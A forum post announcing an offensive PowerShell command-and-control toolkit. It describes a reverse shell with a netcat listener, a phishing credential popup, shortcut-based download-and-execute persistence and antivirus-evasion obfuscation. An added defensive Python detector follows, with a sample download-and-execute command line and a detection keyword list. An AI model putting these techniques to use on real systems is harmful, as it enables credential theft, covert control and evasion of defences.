Fathomless has been a project I have been working on and includes some new tools.

Running environment is Ubuntu 14.04 LTS

Updated the description below to include recent changes.

Async Shell Handler:

Provides a prototype C&C web server along with an asynchronous PowerShell client, and a basic command interface. The server is hosted on a lighttpd server using HTTPS with a self-signed certificate. Since the C&C is a CGI hosted on a lighttpd server, you can edit the included lighttpd.conf to only allow connections from the expected IP range.

The async client performs basic key fingerprint comparison for the self-signed cert and basic authentication to the C&C. These values are randomly generated upon installation. All requests and responses from the client are performed via HTTPS GET requests with URL-safe base64 encoded strings.

The client initially operates in memory, so if it exits or the system reboots the process will be terminated and flushed from memory.

Limited persistence has been added via the shortcut-inject function available in the async and tcp PowerShell clients.

The tcp reverse shell version of the client does not require the C&C component, just an open tcp port with netcat.
ex: nc -lvvp 443

Available functions from the client:

* get-info
  Displays a summary of current host.
* exec-script "name-of-script"
  Executes script hosted server side in /var/async-shell/ps-scripts by IEX;
  requires the name of the script filename as a parameter.
* obfuscate "name of text file / script"
  Uses a polyalphabetic obfuscation method on base64 strings,
  writes obfuscated string to file and provides a de-obfuscation key.
* de-obfuscate "(name of text file / script), (key)"
  Performs the inverse of the obfuscation function; requires
  the text file with the obfuscated base64 data and
  de-obfuscation key as parameters.
* gen-key
  Generates a random alphabetic string for use with the
  obfuscate-base64 function.
* obfuscate-base64 "(action:hide or clear ), (key: obfuscation or de-obfuscation), (base64-string)"
  The function that contains the obfuscation engine; it works only with clear base64 data.
* byte-encode ( binary-to-obfuscate, key )
  Performs byte-encoding prior to converting to obfuscated
  base64 provide key de-obfuscation.
* byte-decode ( file-containing-obfu-base64, key )
  Performs the reverse of byte-encode; requires the de-obfuscation key.
* askfor-creds
  Performs some social engineering in order to acquire plain-text credentials. This is done
  by generating an authentication popup which seems to reconnect to a network share.
* gen-enccmd "your command string"
  Generates a PowerShell formatted encoded command. Be sure to quote your command.
  ex: gen-enccmd "cmd /c ipconfig /all"
* shortcut-inject "name-of-lnk" "Url-hosting-script"
  Modifies the specified shortcut to run the original program and also execute a download
  and execute command string. Ex: "Google Chrome.lnk" "full url to powershell script"
  Requires the http:// or https:// in the URL.

Enables execution of a command string on systems while evading countermeasures,
specifically AV signature based detection. This is accomplished by focusing on
obfuscating command strings that typically download a short script
involved in first-stage/initial access.


Live OS that dumps hashes and uses them with winexe to execute commands on remote systems.

I haven't updated it yet since I have been waiting for UEFI support to mature (shim & preloader).

Once that happens I will invest time in it.

Find it on github (.) com/xor-function/fathomless

Let me know if you run into issues.

Edited by xor-function
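
For defenders reviewing process-creation logs, the following added example (not part of the original post or the Fathomless project) decodes PowerShell `-EncodedCommand` arguments of the kind `gen-enccmd` produces and flags download-and-execute strings. The indicator list, the function names and the sample command lines are assumptions constructed for illustration.

```python
import base64
import re

# "-name value" pairs whose value looks like base64.
ARG = re.compile(r"(?:^|\s)[-/]([A-Za-z]+)\s+([A-Za-z0-9+/]{8,}={0,2})(?=\s|$)")
# Assumed, non-exhaustive strings typical of download-and-execute one-liners.
SUSPICIOUS = re.compile(
    r"\b(iex|invoke-expression|downloadstring|downloadfile|net\.webclient|invoke-webrequest)\b",
    re.IGNORECASE)

def is_encoded_flag(name):
    # powershell.exe accepts -EncodedCommand, any prefix of it (-e, -enc, ...) and -ec.
    name = name.lower()
    return name == "ec" or "encodedcommand".startswith(name)

def decode_encoded_commands(cmdline):
    """Return the decoded text of every -EncodedCommand argument in cmdline."""
    decoded = []
    for name, blob in ARG.findall(cmdline):
        if not is_encoded_flag(name):
            continue
        try:  # the argument is base64 over UTF-16LE text
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-16-le"))
        except ValueError:
            continue  # not valid base64 or not UTF-16LE: not an encoded command
    return decoded

def scan(cmdlines):
    """Return (line_index, decoded_command, sorted_indicators) per encoded command."""
    findings = []
    for i, line in enumerate(cmdlines):
        for text in decode_encoded_commands(line):
            hits = sorted({m.lower() for m in SUSPICIOUS.findall(text)})
            findings.append((i, text, hits))
    return findings

def _enc(s):  # used only to build the constructed samples below
    return base64.b64encode(s.encode("utf-16-le")).decode()

# Constructed process-creation command lines (not captured from a real host).
SAMPLES = [
    "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1",
    "powershell.exe -NoP -enc " + _enc("cmd /c ipconfig /all"),
    "powershell.exe -W Hidden -e "
    + _enc("IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/s.ps1')"),
]

if __name__ == "__main__":
    for idx, text, hits in scan(SAMPLES):
        print(idx, "SUSPICIOUS" if hits else "review", hits, text)
```

Any encoded command is worth a look in review; the indicator hits only rank which decoded commands to read first.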